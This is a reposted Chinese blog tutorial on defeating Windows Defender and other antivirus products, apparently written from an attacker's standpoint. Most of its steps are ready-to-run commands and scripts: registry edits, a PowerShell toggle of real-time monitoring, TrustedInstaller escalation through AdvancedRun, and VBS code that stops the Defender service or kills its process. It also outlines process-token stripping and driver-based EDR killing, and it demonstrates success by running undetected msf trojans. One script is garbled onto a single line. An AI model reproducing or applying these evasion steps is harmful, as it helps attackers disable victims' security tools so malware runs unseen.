花式沉默Defender

这篇具有很好参考价值的文章主要介绍了花式沉默Defender。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

编者注:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

前言

总结了一下现在还能用的关闭Defender的方法,部分是原创,一部分借鉴的大佬。觉得字多的同学可以直接跳过思路查看步骤进行实操。

修改注册表关闭Defender

1.测试环境

windows10 20H2

windows10 21H2

windows11

花式沉默Defender

2.思路

微软为了提供用户更妥善的安全保护,在2020年8月更新中更新了支持文档。若用户安装了其他杀毒软件,Defender将自动关闭;若用户卸载杀毒软件解决方案,Defender将强制自动开启。那我们可不可以模拟杀毒软件的行为,让Defender误以为我们安装了杀软,从而达到关闭Defender的目的呢?答案是可以的。

将系统注册表备份,安装杀毒软件后再次提取注册表信息并进行对比。最后将疑似影响Defender运行的键值进行改动对比,最终得出几个键值的排列组合可以达到沉默Defender的作用。

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender下,DisableAntiSpyware的值改为1,DisableAntiVirus的值改为1。

默认情况下并无这两个键值。

花式沉默Defender

更改后:

花式沉默Defender

HKLM\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}下,STATE改为 0x00060100。

花式沉默Defender

3.步骤

管理员模式打开命令行,执行:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t reg_dword /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}" /v STATE /t reg_dword /d "0x00060100" /f

4.成果

修改完后重启,Defender仍然运行,但杀毒引擎已失效。

这里随意丢上一个msf的木马,成功绕过检测。

花式沉默Defender

 5.总结

1)需要管理员权限操作。

2)重启后才能生效。

3)执行完reg add命令后需要检查注册表是否生效,有时执行后注册表未更新,需多执行几次。

4)某些版本只需要更改DisableAntiVirus和STATE这两个键值即可生效。

PowerShell

 1.测试环境

windows10 1809

windows11

花式沉默Defender

2.步骤

管理员权限打开powershell,输入如下命令:

$preferences = Get-MpPreference
Set-MpPreference -DisableRealtimeMonitoring (!$preferences.DisableRealtimeMonitoring)

3.成果

实时保护已关闭,且木马正常运行。

花式沉默Defender

4.总结

1)实时监控虽然关闭,但扫描引擎还正常运行,此时主动扫描木马还是会被检测到。

2)某些系统版本不生效,如windows10 20H2。

花式沉默Defender

TrustedInstaller权限关闭Defender

 1.原理

TrustedInstaller权限是windows vista或7里面为了系统安全起见而设立的,为系统最高权限,比我们所熟知的System权限更高。

在Windows XP及以前,System账户与管理员组对系统文件都有着完全访问的权限。这意味着以管理员身份运行的程序可以任意更改系统,降低了系统安全性。TrustedInstaller则改变了这一情况,使得只有拥有TrustedInstaller令牌的系统进程才能更改系统重要内容,而其他大部分系统服务就没有权限。   这是因为,以SYSTEM权限运行的程序不一定同时拥有TrustedInstaller的权限,只有通过了Service Control Manager(服务启动控制器)的验证后才能获取。

所以SYSTEM权限做不到的事情,我们可以尝试通过TrustedInstaller权限实现。

2.思路

我们可以利用工具获取TrustedInstaller权限,从 Nirsoft 官方页面(https://www.nirsoft.net/utils/advanced_run.html)下载AdvancedRun

将可执行文件AdvancedRun.exe解压出来后即可执行如下命令将程序作为TrustedInstaller启动。

AdvancedRun.exe /EXEFilename "c:\windows\system32\cmd.exe" /RunAs 8 /Run

此时弹出一个cmd,虽然查看当前用户显示System,但我们使用 whoami /priv查看特权还是能对比出与System的差别的。

TrustedInstaller:

花式沉默Defender

System:

花式沉默Defender

接下来我们尝试利用TrustedInstaller权限来关闭Defender。

创建一个vbs脚本来自动化关闭Defender,内容如下。

cription: Script to disable the Microsoft Defender Antivirus serviceSet ServiceSet = GetObject("winmgmts:").ExecQuery _("select * from Win32_Service where Name='WinDefend'")For Each Service In ServiceSet   RetVal = Service.StopService()    If RetVal <> 0 Then       MsgBox "Error " & RetVal   End If   Service.ChangeStartMode("Manual")Next

利用wscript.exe执行脚本。

AdvancedRun.exe /EXEFilename "%windir%\system32\wscript.exe" /CommandLine '"C:\Users\Pepper\Downloads\advancedrun\1.vbs"' /RunAs 8 /Run

返回错误。

花式沉默Defender

Error 2 表示用户没有所需的访问权限。

既然没有对服务的访问权限,那我们可以试一下能不能直接关闭Defender的进程,将上面的脚本改动一下,关闭MsMpEng.exe进程:

Set ServiceSet2 = GetObject("winmgmts:\\.\root\cimv2")
Set ServiceSet = ServiceSet2.Execquery("select * from Win32_Process where Name='MsMpEng.exe'")
For Each Service In ServiceSet
  RetVal = Service.Terminate() 
  If RetVal <> 0 Then 
    MsgBox "Error " & RetVal
  End If
Next

又返回了Error2,思路似乎到这里就断了。但是之前研究Defender注册表的时候发现了一个表项中存储着Defender的运行信息,当时将权限提升到System也没有修改成功。

花式沉默Defender

试着以TrustedInstaller权限修改一下。

花式沉默Defender

轻松干掉Defender。

3.步骤

1)TrustedInstaller权限启动cmd。

AdvancedRun.exe /EXEFilename "c:\windows\system32\cmd.exe" /RunAs 8 /Run

2)执行reg add命令,修改注册表

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f

4.总结

与方案一相比,不需要重启,但是需要上传工具获取TrustedInstaller权限。

修改进程Token,关闭杀毒引擎

 1.原理

利用Windows 提供的OpenProcessTokenAPI 与进程令牌进行交互,MSDN声明必须PROCESS_QUERY_INFORMATION有权使用OpenProcessToken,但实际未受保护的进程可以通过PROCESS_QUERY_INFORMATION操作受保护进程的令牌。使用这种技术,攻击者可以强行删除MsMpEng.exe令牌中的所有权限,并将其从系统降低到不受信任的完整性。对不受信任的完整性的削弱会阻止受害进程访问系统上的大多数安全资源,从而在不终止进程的情况下悄悄地使进程失去能力。

2.思路

已经有师傅写好代码并开源了,这里大概讲解一下思路。

花式沉默Defender

首先执行EnableDebugPrivilege函数提升当前进程权限,然后利用getpid函数获取到我们想修改Token的进程的PID,实现逻辑是遍历当前进程名,匹配后返回该进程PID。

花式沉默Defender

利用OpenProcess打开指定进程,并调用OpenProcessToken获取该进程Token。

花式沉默Defender

接下来需要使用 SetPrivilege()函数将进程的权限全部都去除掉。

花式沉默Defender

SetPrivilege的实现和之前提到过的EnableDebugPrivilege函数实现方式类似,主要用到三个函数:OpenProcessToken获取进程的令牌句柄,LookupPrivilegeValue查询进程权限,AdjustTokenPrivileges修改进程权限。注意EnableDebugPrivilege是修改当前进程的DEBUG权限,SetPrivilege是修改指定进程的指定权限。

花式沉默Defender

最后使用SetTokenInformation设置信息替换访问令牌的现有信息,破坏其完整性。

3.局限

必须获取system权限才能使用该方法。

花式沉默Defender

4.成果

扫描引擎已失效,点击扫描无法正常运行。

花式沉默Defender

生成一个原始木马,未被识别并上线。

花式沉默Defender

继续测试火绒的进程HipsDaemon.exe,同样生效。

花式沉默Defender

测试360时,发现有行为检测被拦截。

花式沉默Defender

测试卡巴斯基,可以关闭扫描引擎,但会由于未知原因断网,难以利用。

花式沉默Defender

利用驱动关闭杀毒引擎

1.原理

加载自带微软官方签名的 ProcExp 驱动,利用其导出函数做到 Kill EDR 的效果。

2.思路

大佬已经写得很好了,参考资料。

其它

K杀软的方式还有很多,比如还可以修改组策略,利用未文档化函数等,参考资料。

参考内容

https://www.winhelponline.com/blog/enable-or-disable-defender-shortcut-command-line/

https://www.winhelponline.com/blog/run-program-as-trustedinstaller-locked-registry-keys-files/

http://ryze-t.com/posts/2021/06/29/EdrKiller.html

https://elastic.github.io/security-research/whitepapers/2022/02/02.sandboxing-antimalware-products-for-fun-and-profit/article/文章来源地址https://www.toymoban.com/news/detail-453314.html

到了这里,关于花式沉默Defender的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • RANSAC算法(仅供学习使用)

    RANSAC(Random Sample Consensus)算法是一种基于随机采样的迭代算法,用于估计一个数学模型参数。它最初由Fischler和Bolles于1981年提出,主要用于计算机视觉和计算机图形学中的模型拟合和参数估计问题。 RANSAC算法的基本思想是通过随机采样一小部分数据来估计模型参数,然后用

    2024年02月06日
    浏览(41)
  • Web安全——穷举爆破上篇(仅供学习)

    穷举就是枚举的意思,在互联网的今天,需要使用某种的服务,大多数都需要口令登录,这个口令就是密码,密码的强度分为,弱口令 、中度口令、强度口令。如果登录的服务为弱口令,那会存在很大的安全隐患,黑客通过穷举弱口令对服务进行攻击,很容易就得到登录密码

    2024年02月09日
    浏览(45)
  • Web安全——穷举爆破下篇(仅供学习)

    hydra 是一个端口穷举服务器的工具 adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin

    2024年02月09日
    浏览(49)
  • 欧氏距离聚类算法(仅供学习使用)

    欧氏距离聚类算法(Euclidean Distance Clustering Algorithm)是一种基于欧氏距离的聚类算法,其思想是将样本空间中距离比较近的样本点归为一类,距离较远的样本点归为不同的类。该算法是一种层次聚类算法,因为其生成的聚类结果可以表示为一棵树状结构(称为聚类树或者谱树

    2024年02月07日
    浏览(38)
  • Web安全——Web安全漏洞与利用上篇(仅供学习)

    漏洞描述   Web 程序代码中对于用户提交的参数未做过滤就直接放到 SQL 语句中执行,导致参数中的特殊字符打破了 SQL 语句原有逻辑,黑客可以利用该漏洞执行任意 SQL 语句,如查询数据、下载数据、写入 webshell 、执行系统命令以及绕过登录限制等。 测试方法    在发现

    2024年02月10日
    浏览(44)
  • Python爬取MidJourney历史图片【仅供参考学习使用】

    使用MidJourney时, 在https://www.midjourney.com/app/这里有接口https://www.midjourney.com/api/app/recent-jobs/?amount=35dedupe=truejobStatus=completedjobType=upscaleorderBy=newpage=3prompt=undefinedrefreshApi=0searchType=advancedservice=nulltoDate=2023-06-16+09%3A50%3A17.379092type=alluserId=b12e169c-f609-4fd6-b917-11c2deaa8cffuser_id_ranked_score=n

    2024年02月13日
    浏览(55)
  • 天猫商城自动化python脚本(仅供初学者学习使用)

    作者:Eason_LYC 悲观者预言失败,十言九中。 乐观者创造奇迹,一次即可。 一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有! 技术领域:WEB安全、网络攻防 关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半

    2024年01月17日
    浏览(55)
  • OpenCV学习笔记之Overload报错的处理(仅供参考)

    今天在练习一个文档识别的小项目时,运行后一直提示报错,可是我还不知道问题出在哪里,源代码如下: 报错内容如下: 可是错误并不在报错所提示的那一行,而是上面的findContours()函数,新版本中这个函数要有两个返回值(以前好像是有三个),猛然反应过来以后,加上

    2024年02月12日
    浏览(36)
  • 【JS逆向一】逆向某站的 加密参数算法--仅供学习参考

    逆向日期:2024.02.06 使用工具:Node.js 文章全程已做去敏处理!!!  【需要做的可联系我】 可使用AES进行解密处理(直接解密即可):在线AES加解密工具 1、打开某某网站(请使用文章开头的AES在线工具解密):T9mpG48zIdYFB40hkjsQS4+N5rr4x4mSPHlx5EoT/+s= 2、点击右上角的登录按钮,账号

    2024年02月22日
    浏览(54)
  • 深度学习:从入门到精通课后习题解答本答案仅供参考

    第一章: 1、通过本章的学习,你认为深度学习崛起的原因有哪些? 答:(1) 计算能力的发展。深度学习的起源并不晚,但是在发展初期遭遇瓶颈的最主要原因是:当时的计算资源无法支持我们实现深度学习如此庞大复杂的计算。直到我们开始使用GPU进行计算后,深度学习才终

    2024年02月07日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包